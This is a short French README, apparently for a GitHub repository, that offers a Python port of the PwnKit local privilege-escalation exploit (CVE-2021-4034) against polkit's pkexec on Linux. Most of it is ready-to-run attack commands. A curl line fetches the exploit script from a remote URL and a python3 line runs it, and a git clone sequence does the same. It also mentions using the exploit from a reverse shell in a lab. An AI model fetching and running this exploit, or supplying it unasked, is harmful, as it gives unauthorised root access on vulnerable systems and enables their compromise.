
Exploit Python pour la vulnérabilité d'élévation de privilèges locale PwnKit (CVE-2021-4034), fournissant un accès shell root via pkexec de polkit sur les systèmes Linux vulnérables.
Ceci est un exploit en Python permettant, une fois en possession d'un shell, d'effectuer une escalade de privilèges de x jusqu'à root. Il fonctionne via la vulnérabilité CVE-2021-4034, également appelée PwnKit.
curl -fsSL https://raw.githubusercontent.com/ropydev/CVE-2021-4034-PwnKit/main/main.py -o exploit.py
python3 exploit.py
git clone https://github.com/ropydev/CVE-2021-4034-PwnKit.git
cd CVE-2021-4034-PwnKit
python main.py
Ces exemples ont été réalisés via un laboratoire avec un reverse shell ; nous exécutons ainsi l'exploit et passons facilement à root.
Ce programme n'est qu'une « traduction » ou l'équivalent en Python du programme original, qui a été écrit en C.